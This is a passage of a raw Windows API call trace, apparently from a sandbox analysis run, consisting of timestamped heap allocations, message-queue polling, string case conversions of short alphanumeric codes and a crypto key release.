hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34d4950*, pdwDataLen=0x8bef68*=0x11372, dwBufLen=0x11378 | out: pbData=0x34d4950*, pdwDataLen=0x8bef68*=0x11378) returned 1 [0199.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0199.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0199.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0199.236] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01d0 [0199.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0199.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01a0 [0199.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0199.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01b0 [0199.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01e0 [0199.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.236] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.237] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01d0 [0199.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0199.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.237] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0199.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0199.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0199.238] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.238] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0199.239] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0199.239] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0199.239] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.240] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0199.240] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.240] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0199.240] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0199.240] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.240] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0199.241] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.241] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.241] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.241] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0199.241] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.241] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0199.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0199.242] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.242] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.242] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0199.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0199.242] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.242] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0199.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.256] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.256] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.256] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.262] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0199.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.262] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0199.263] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0199.263] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.263] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0199.263] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.263] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0199.264] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.264] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0199.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.264] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.264] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0199.264] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0199.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.265] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0199.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.265] CryptDestroyKey (hKey=0xaa57a0) returned 1 [0199.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0199.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0199.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.266] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0199.266] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0199.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0199.266] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0199.266] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0199.266] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0199.266] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.266] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0199.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0199.267] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0199.267] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0199.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.267] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0199.267] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.267] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0199.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.267] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.267] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0199.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.268] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.268] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0199.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0199.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.268] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.268] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0199.268] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0199.268] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.268] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.268] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.268] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.269] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.269] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0199.269] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.269] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0199.269] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 